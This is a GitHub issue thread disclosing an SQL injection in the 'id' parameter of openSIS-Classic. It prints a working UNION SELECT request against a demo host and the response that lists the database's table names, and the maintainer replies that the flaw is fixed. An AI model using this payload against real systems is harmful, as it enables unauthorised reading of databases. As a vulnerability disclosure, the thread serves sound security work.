### ISSUE TITLE
SQL Injection in id Parameter

### ISSUE THREAD

**Issue by CP04042K** [OS4ED/openSIS-Classic#195]
Due to no security mechanism was implemented in parameter `id`, attacker can inject arbitrary SQL query and extract database informations 

![Screenshot from 2021-09-01 22-34-35](https://user-images.githubusercontent.com/35491855/131700825-f4e7a36a-22d2-43fb-b442-948cd4c9a4b8.png)
### Vulnerable code section
**ChooseCpSearch.php**
![Screenshot from 2021-09-01 22-37-03](https://user-images.githubusercontent.com/35491855/131702274-8fc8f7a3-0d0a-46f0-b5b8-0e222fa8f64b.jpg)
**ChooseRequestSearch.php**
![Screenshot from 2021-09-01 22-40-53](https://user-images.githubusercontent.com/35491855/131702347-eabb8531-9631-4bd9-a12c-8096e9ec85b5.jpg)
### Request and Response

<pre>GET /ChooseRequestSearch.php?id=1'+union+select+1,group_concat(table_name),3+FROM+information_schema.tables+WHERE+table_schema=database()--+-&table_name=courses HTTP/1.1
Host: demo.opensis.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Connection: close
Referer: http://demo.opensis.com/Modules.php?modname=miscellaneous/Portal.php&failed_login=
Cookie: PHPSESSID=hlbs4pioon9tgupfig1n2hsgu1</pre>

<pre>HTTP/1.1 200 OK
Date: Wed, 01 Sep 2021 15:34:05 GMT
Server: Apache/2.4.7 (Ubuntu)
X-Powered-By: PHP/5.5.9-1ubuntu4.29
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1194
Connection: close
Content-Type: text/html

course_modal_request||<h6>3 courses were found.</h6><table class="table table-bordered"><thead><tr class="alpha-grey"><th>Course</th></tr></thead><tbody><tr><td><a href=javascript:void(0); onclick="requestPasteField('Reading','1');">Reading</a></td></tr><tr><td><a href=javascript:void(0); onclick="requestPasteField('Writing','9');">Writing</a></td></tr><tr><td><a href=javascript:void(0); onclick="requestPasteField('api_info,app,attendance_calendar,attendance_code_categories,attendance_codes,attendance_completed,attendance_day,attendance_period,calendar_events,calendar_events_visibility,course_details,course_period_var,course_periods,course_subjects,courses,custom_fields,device_info,eligibility,eligibility_activities,eligibility_completed,enroll_grade','1');">api_info,app,attendance_calendar,attendance_code_categories,attendance_codes,attendance_completed,attendance_day,attendance_period,calendar_events,calendar_events_visibility,course_details,course_period_var,course_periods,course_subjects,courses,custom_fields,device_info,eligibility,eligibility_activities,eligibility_completed,enroll_grade</a></td></tr></tbody></table><div id="request_div" style="display:none;"></div></pre>

**Comment by CP04042K** [comment]
@openSISAdmin please review and reply soon

**Comment by CP04042K** [comment]
> @openSISAdmin please review and reply soon

**Comment by openSISAdmin** [comment]
Fixed
